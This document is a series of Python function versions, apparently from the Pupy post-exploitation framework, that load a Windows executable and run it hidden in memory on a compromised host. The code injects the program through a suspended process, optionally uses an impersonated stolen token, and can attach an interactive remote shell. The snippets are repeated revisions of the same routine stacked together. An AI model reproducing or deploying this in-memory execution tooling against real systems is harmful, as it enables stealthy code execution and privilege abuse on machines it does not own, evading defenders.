def run(self, args):
if args.interactive:
#TODO
self.error("interactive memory execution has not been implemented yet")
return
#check we are injecting from the good process arch:
pe_arch=get_pe_arch(args.path)
proc_arch=self.client.desc["proc_arch"]
if pe_arch!=proc_arch:
self.error("%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or first migrate into a %s process"%(args.path, pe_arch, proc_arch, proc_arch, pe_arch))
return
wait=True
redirect_stdio=True
if args.fork:
wait=False
redirect_stdio=False
raw_pe=b""
with open(args.path,'rb') as f:
raw_pe=f.read()
self.client.load_package("pupymemexec")
self.client.load_package("pupwinutils.memexec")
res=""
self.mp=self.client.conn.modules['pupwinutils.memexec'].MemoryPE(raw_pe, args=args.args, hidden=True, redirect_stdio=redirect_stdio)
self.mp.run()
while True:
if self.mp.wait(1):
break
self.mp.close()
res=self.mp.get_stdout()
self.log(res)
def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, fork=False, timeout=None, use_impersonation=False, suspended_process="cmd.exe"):
if not raw_pe and not path:
raise Exception("raw_pe or path must be supplied")
if path:
pe_arch=get_pe_arch(path)
proc_arch=module.client.desc["proc_arch"]
if pe_arch!=proc_arch:
module.error("%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"%(path, pe_arch, proc_arch, proc_arch, pe_arch))
return
wait=True
redirect_stdio=True
if fork:
wait=False
redirect_stdio=False
if not raw_pe:
raw_pe=b""
with open(path,'rb') as f:
raw_pe=f.read()
module.client.load_package("pupymemexec")
module.client.load_package("pupwinutils.memexec")
res=""
dupHandle=None
if use_impersonation:
dupHandle=module.client.impersonated_dupHandle
if dupHandle is None:
module.error("No token has been impersonated on this session. use impersonate module first")
return
if not hasattr(module, 'mp'):
setattr(module, 'mp', None)
module.mp=module.client.conn.modules['pupwinutils.memexec'].MemoryPE(raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio, suspended_process=suspended_process, dupHandle=dupHandle)
with redirected_stdio(module.client.conn):
module.mp.run()
if not fork:
if interactive:
try:
with redirected_stdio(module.client.conn):
module.mp.get_shell()
finally:
module.mp.close()
else:
starttime=time.time()
while True:
if module.mp.wait(1):
break
if timeout:
if time.time()-starttime>timeout:
break
module.mp.close()
res=module.mp.get_stdout()
module.log(res)
return res
def run(self, args):
if args.fork and args.interactive:
self.error("--fork and --interactive options can't be used together")
return
#check we are injecting from the good process arch:
pe_arch=get_pe_arch(args.path)
proc_arch=self.client.desc["proc_arch"]
if pe_arch!=proc_arch:
self.error("%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"%(args.path, pe_arch, proc_arch, proc_arch, pe_arch))
return
wait=True
redirect_stdio=True
if args.fork:
wait=False
redirect_stdio=False
raw_pe=b""
with open(args.path,'rb') as f:
raw_pe=f.read()
self.client.load_package("pupymemexec")
self.client.load_package("pupwinutils.memexec")
res=""
self.mp=self.client.conn.modules['pupwinutils.memexec'].MemoryPE(raw_pe, args=args.args, hidden=True, redirect_stdio=redirect_stdio)
self.mp.run()
if not args.fork:
if args.interactive:
try:
with redirected_stdio(self.client.conn):
self.mp.get_shell()
finally:
self.mp.close()
else:
starttime=time.time()
while True:
if self.mp.wait(1):
break
if args.timeout:
if time.time()-starttime>args.timeout:
break
self.mp.close()
res=self.mp.get_stdout()
self.log(res)
def exec_pe(self, path, prog_args, interactive=False, fork=False, timeout=None):
pe_arch = get_pe_arch(path)
proc_arch = self.client.desc["proc_arch"]
if pe_arch != proc_arch:
self.error(
"%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"
% (path, pe_arch, proc_arch, proc_arch, pe_arch)
)
return
wait = True
redirect_stdio = True
if fork:
wait = False
redirect_stdio = False
raw_pe = b""
with open(path, "rb") as f:
raw_pe = f.read()
self.client.load_package("pupymemexec")
self.client.load_package("pupwinutils.memexec")
res = ""
self.mp = self.client.conn.modules["pupwinutils.memexec"].MemoryPE(
raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio
)
self.mp.run()
if not fork:
if interactive:
try:
with redirected_stdio(self.client.conn):
self.mp.get_shell()
finally:
self.mp.close()
else:
starttime = time.time()
while True:
if self.mp.wait(1):
break
if timeout:
if time.time() - starttime > timeout:
break
self.mp.close()
res = self.mp.get_stdout()
self.log(res)
def exec_pe(module,
prog_args,
path=None,
raw_pe=None,
interactive=False,
fork=False,
timeout=None,
use_impersonation=False,
suspended_process="cmd.exe"):
if not raw_pe and not path:
raise Exception("raw_pe or path must be supplied")
if path:
pe_arch = get_pe_arch(path)
proc_arch = module.client.desc["proc_arch"]
if pe_arch != proc_arch:
module.error(
"%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"
% (path, pe_arch, proc_arch, proc_arch, pe_arch))
return
wait = True
redirect_stdio = True
if fork:
wait = False
redirect_stdio = False
if not raw_pe:
raw_pe = b""
with open(path, 'rb') as f:
raw_pe = f.read()
res = ""
dupHandle = None
if use_impersonation:
dupHandle = module.client.impersonated_dupHandle
if dupHandle is None:
module.error(
"No token has been impersonated on this session. use impersonate module first"
)
return
if not hasattr(module, 'mp'):
setattr(module, 'mp', None)
module.mp = module.client.conn.modules['pupwinutils.memexec'].MemoryPE(
raw_pe,
args=prog_args,
hidden=True,
redirect_stdio=redirect_stdio,
suspended_process=suspended_process,
dupHandle=dupHandle)
with redirected_stdio(module):
module.mp.run()
if not fork:
if interactive:
try:
with redirected_stdio(module):
module.mp.get_shell()
finally:
module.mp.close()
else:
starttime = time.time()
while True:
if module.mp.wait(1):
break
if timeout:
if time.time() - starttime > timeout:
break
module.mp.close()
res = module.mp.get_stdout()
module.log(res)
return res
def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_impersonation=False, suspended_process="cmd.exe", codepage=None):
if not raw_pe and not path:
raise Exception("raw_pe or path must be supplied")
if path:
pe_arch = get_pe_arch(path)
proc_arch = module.client.desc["proc_arch"]
if pe_arch != proc_arch:
module.error(
'%s is a %s PE and your pupy payload is a %s process. '
'Please inject a %s PE or migrate into a %s process first'%(
path, pe_arch, proc_arch, proc_arch, pe_arch))
return
wait = True
if not raw_pe:
raw_pe = b''
with open(path,'rb') as f:
raw_pe = f.read()
res = ''
dupHandle = None
if use_impersonation:
dupHandle = module.client.impersonated_dupHandle
if dupHandle is None:
module.error('No token has been impersonated on this session. use impersonate module first')
return
if not hasattr(module, 'mp'):
setattr(module, 'mp', None)
module.mp = module.client.conn.modules[
'pupwinutils.memexec'
].MemoryPE(
raw_pe, args=prog_args, hidden=True,
suspended_process=suspended_process,
dupHandle=dupHandle
)
complete = threading.Event()
if interactive:
repl, _ = CmdRepl.thread(
module.stdout,
module.mp.write,
complete,
True, None,
codepage
)
module.client.conn.register_remote_cleanup(
module.mp.close
)
if module.mp.execute(complete.set, repl._con_write):
complete.wait()
module.mp.close()
module.client.conn.unregister_remote_cleanup(
module.mp.close
)
module.success('Process exited. Press ENTER')
else:
complete.set()
module.error('Launch failed. Press ENTER')
else:
pid = module.mp.execute(complete.set, None)
if pid:
complete.wait()
module.success('[Process launched: PID={}]'.format(pid))
else:
module.error('Launch failed')
return module.mp.stdout